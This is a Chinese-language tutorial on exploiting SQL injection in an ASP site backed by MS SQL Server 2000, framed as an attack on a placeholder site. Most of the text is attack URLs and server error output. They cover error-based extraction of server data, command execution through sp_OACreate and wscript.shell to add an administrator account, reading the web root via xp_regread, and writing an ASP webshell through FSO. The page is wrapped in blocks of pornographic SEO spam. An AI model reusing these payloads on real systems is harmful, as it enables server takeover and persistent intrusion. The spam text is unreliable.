日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

榨干MS SQL Server 最后一滴血

瀏覽:267日期:2023-10-29 12:37:53

風云變換的網絡,網絡安全讓人們不能不關注它。數據庫,讓我們不得不想起強大的ORACLE,MS SQL。微軟的漏洞最多,今天就用SQL INJECTION來讓MS SQL為我們好好的工作。

以下(使用一知名網站作為測試點),相信大家對SQL爆庫,爆表,爆字段都已掌握,在這里就不多說這方面了。

MS SQL內置函數介紹:

@@VERSION 獲得Windows的版本號,MS SQL的版本號,補丁。 User_name() 得到當前系統的連接用戶 Db_name() 得到當前連接的數據庫 HOST_NAME() 得到當前主機的名稱

這些信息有助我們對系統進行簡單的了解

好,下面我們就開始吧!

語句:

http://www.xxx.com/list.asp?classid=1'

返回信息:

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14' 字符串 ' Order By Id DESC' 之前有未閉合的引號。 /list.asp,行290;

從這里未閉合的引號(“’”),我們可以確定存在SQL INJECTION。發現在漏洞當然接著走了,利用以上介紹的函數為我們工作了:

語句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select @@version)

返回:

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07' 將 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 轉換為數據類型為 int 的列時發生語法錯誤。 /list.asp,行290;

相關的信息出來了,MS SERVER ADVANCED SERVER 2000+SP4, SQL 2000+SP3,從MS SQL SERVER 后面的8.00.760可看出是SP3補丁。看了服務器的信息,接下應該了解數據庫的權限了:

語句:

http://www.xxx.com/list.asp?classid=1 and user_name()=’dbo’

返回: 正常返回的信息

確定是權限是DBO,從表面DBO權限的連接用戶經常是涉及SYSADMIN服務器角色成員。說明數據庫服務器角色成員組默認是在每個數據庫增加一個DBO用戶。

返回原理根1=1,1=2相似..這里只是權限測試,我們也把它爆出來看看:

語句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select user_name())

返回:

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07' 將 nvarchar 值 'dbo' 轉換為數據類型為 int 的列時發生語法錯誤。 /list.asp,行290;

說明連接數據庫的用戶權限很高,可以確定是服務器角色組中的成員。

語句:http://www.xxx.com/list.asp?classid=1 and 0<>(select db_name())—返回:Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07' 將 nvarchar 值 'GameIMGSys' 轉換為數據類型為 int 的列時發生語法錯誤。 /list.asp,行290

這樣就可以爆出當前的數據庫。得到這么高權限的數據庫連接成員,我們當然想直接得到WEBSHELL,或是直接拿到NT ADMIN。NT ADMIN取決于當前服務器的配置,如果配置不合理的服務器,我們要直接拿NT ADMIN,拿NT ADMIN就要用到:

MSSQL內置存儲過程:

sp_OACreate (通過它,危害很得更大,但是需要有SYSADMINS權限才可能使用) sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_SetPropertysp_OAStop

由于MS SQL一次可以執行多語句,使得我們有機會使用更多的語句。

語句:

http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user cntest chinatest /add'

正常返回。(提示:如果主機上shell存在的話那將在服務器上創建一個cntest的用戶)

創建用戶了,語句后再加個net localgroup administrators cntest /add加到管理組中。 如果對方的機子開著3389端口,或IPC的話,那接下來的事,就不用我多說了。

遇到專業型主機,只開一個80端口,那應該怎么辦呢?當然,我們還是可能拿到WEBSHELL,再慢慢滲透的。

由于權限高,我們可能先建表,寫入ASP木馬的數據再通過MAKEWEBTASK,得到WEBSEHLL.手工寫入的程序太過于繁鎖,上傳WEBSHELL最大的問題還是網頁目錄,現在網上已經有現成的工具通過BACKUP,和MASKWEBTASK的工具得到WEBSHELL了。以下推薦,獲取網頁路徑(通過存儲過程達到對注冊表的讀取):

利用內置存儲過程 xp_regread(讀取注冊表鍵值,權限public):

語句:

http://www.xxx.com/list.asp?classid=1;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test);

IIS的默認路徑的在注冊表中HKEY_LOCAL_MACHINE SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots

利用爆字段將數據庫的值讀出來:

語句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)

返回:

Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]將 varchar 值 'E:www,,201' 轉換為數據類型為 int 的列時發生語法錯誤。;

這說明網頁目錄在E:www,接下來也可以利用FSO直接寫入ASP木馬(提示必須擁用SYSADMIN權限才可使用FSO和FSO開入的前提下) :

語句:

http://www.xxx.com/list.asp?class=1;declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',%20@o%20out%20exec%20sp_oamethod%20@o,%20'createtextfile',%20@f%20out,%20'e:wwwtest.asp',1%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20NULL,%20'On Error Resume Next'

在E:WWW下創建一個test.asp并寫入On Error Resume next語句:

http://www.xxx.com/list.asp?classid=1;declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',%20@o%20out%20exec%20sp_oamethod%20@o,%20'opentextfile',%20@f%20out,%20'e:wwwtest.asp',8%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20NULL,%20'asp horse '

在E:WWWtest.asp增加一行記錄,記錄為asp horse, 整個完整木馬可能這樣寫入。(%百分號要用%25替代寫入)。如果得不到網頁目錄,怎么辦呢?前提你要猜到網站是否使用默認WEB,或者使用域名作為WEB。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscript.exe c:inetpubwwwrootmkwebdir.vbs -w '默認 Web 站點' -v 'e','e:'’;

在默認的WEB站點下創建一個虛擬目錄E,指向E:盤下。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse’

給虛擬目錄e加上瀏覽屬性不錯吧。給自己開虛擬服務。想那些網頁目錄路徑,頭都快破了。這下給自己一個天開眼了。那傳WEBSHELL利用MS SQL為我們的工作告了一段落了,接下來工作應該由你來了。

標簽: Sql Server 數據庫
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
亚洲综合小说| 亚洲欧美日韩综合国产aⅴ| 精品视频免费| 日韩av不卡一区二区| 亚洲免费婷婷| 国产三级一区| 日韩一区二区三区四区五区| 日韩一区二区免费看| 亚洲午夜91| 日韩一区二区三免费高清在线观看| 麻豆亚洲精品| 福利视频一区| 国产精品videosex极品| 日韩黄色在线观看| 视频一区二区欧美| 日本精品不卡| 日韩国产一区| 国产成人精品一区二区免费看京| 欧美aa在线视频| 国产精品嫩模av在线| 亚洲一级大片| 亚洲久久在线| 日韩在线视频一区二区三区| 综合激情网...| 最新日韩欧美| 亚洲制服少妇| 国产综合婷婷| 久久伦理在线| 欧美美女一区| 在线亚洲激情| 首页欧美精品中文字幕| 亚洲影视一区| 日韩三区四区| 国产亚洲一卡2卡3卡4卡新区| 日韩毛片视频| 日韩a一区二区| 精品视频在线观看网站| 麻豆国产欧美一区二区三区| 美国欧美日韩国产在线播放| 欧美成人高清| 日日夜夜免费精品| 91久久久精品国产| 日韩欧美在线中字| 国产精品videossex| 日韩国产91| 国产欧美激情| 国产精品一区二区av日韩在线| 国产精品九九| 精品网站999| 精品久久久久久久| 成人在线网站| 黄色成人91| 中文字幕亚洲精品乱码| 欧美在线看片| 国产白浆在线免费观看| 欧美成人国产| 免费高潮视频95在线观看网站| 中文字幕免费精品| 麻豆91精品视频| 成人午夜国产| 视频一区二区三区入口| 国产欧美一区二区三区精品观看 | 日韩激情一二三区| 国产精品一站二站| 国产极品模特精品一二| 久久香蕉网站| 免费一级欧美在线观看视频 | 成人午夜在线| 欧美日韩第一| 日韩av资源网| 国产 日韩 欧美 综合 一区| 九色精品91| 91精品日本| 天堂中文av在线资源库| 蜜桃视频在线观看一区二区| 久久在线91| 午夜在线观看免费一区| 国产精品三级| 91精品福利| 久久不卡日韩美女| 成人小电影网站| 伊人精品久久| 国产精品久久久久久久久久10秀| 99香蕉国产精品偷在线观看 | 国产精品久久久久久久免费软件| 欧美福利专区| 国产成人精品一区二区三区在线| 欧美日韩国产综合网| 国产日韩欧美一区在线| 精品久久在线| 视频一区中文字幕国产| 国产a亚洲精品| 午夜一级在线看亚洲| 国产一区二区三区四区五区传媒| 免费看欧美美女黄的网站| 水蜜桃精品av一区二区| 亚久久调教视频| 久久亚洲精品中文字幕蜜潮电影| 欧美在线精品一区| 日韩欧美精品一区| 日韩av字幕| 大香伊人久久精品一区二区| 亚洲成人三区| 精品视频91| 爽好久久久欧美精品| 国产一区二区三区探花| 最新亚洲国产| 999国产精品视频| 国产精品免费99久久久| 视频在线观看一区二区三区| 里番精品3d一二三区| 日韩在线一二三区| 少妇精品导航| 国产精品白浆| 樱桃成人精品视频在线播放| 国内在线观看一区二区三区 | 国产精一区二区| aa亚洲婷婷| 久久精品亚洲人成影院 | 国产精品永久| 亚洲天堂免费| 国产精品字幕| 久久亚洲黄色| 国产精品一区二区三区美女| 国产韩日影视精品| 国产成人精品一区二区三区在线| 天使萌一区二区三区免费观看| 日产午夜精品一线二线三线| 日韩精品高清不卡| 亚洲高清激情| 一区二区精品伦理...| 日韩一区精品字幕| 婷婷激情图片久久| 久久久成人网| bbw在线视频| 国产一区福利| 精品免费av一区二区三区| 国产视频网站一区二区三区| 在线精品福利| 国产精品日本| 99视频精品免费观看| 欧美亚洲国产激情| 丝袜美腿诱惑一区二区三区| av高清不卡| 精品亚洲自拍| 欧美成人精品午夜一区二区| 国产探花在线精品| 欧美午夜网站| 欧美午夜三级| 国产日韩欧美三级| 欧美日韩调教| 国产精品一卡| 国产精品亲子伦av一区二区三区 | 欧美永久精品| 亚洲涩涩av| 亚洲欧洲美洲国产香蕉| 宅男噜噜噜66国产日韩在线观看| 国精品一区二区| 在线综合亚洲| 亚洲午夜免费| 91久久精品无嫩草影院| 国产日韩欧美一区二区三区在线观看| 国产亚洲欧美日韩在线观看一区二区| 91在线成人| 麻豆成人av在线| 国产一区福利| 正在播放日韩精品| 精品三级久久| 91国语精品自产拍| 美女精品在线| 91精品国产经典在线观看| 国产午夜一区| 精品视频国产| 久久久久国产精品一区三寸| 女人av一区| 综合日韩在线| 国产精品jk白丝蜜臀av小说| 色一区二区三区四区| 久久精品电影| 先锋亚洲精品| 精品视频网站| 模特精品在线| 日韩不卡一区| 亚洲aⅴ网站| 久久精品99久久无色码中文字幕| 久久国产尿小便嘘嘘| 久久国产电影| 国产精品蜜月aⅴ在线| 日本免费在线视频不卡一不卡二| 欧美日韩第一| 精品在线网站观看| 国产欧美一区二区精品久久久| 亚洲综合中文| 免费观看在线综合色| 国产日韩专区| 99国产精品视频免费观看一公开 | 亚洲一区二区三区中文字幕在线观看| 欧美综合国产| 精品国产乱码久久久| 蜜臀国产一区二区三区在线播放|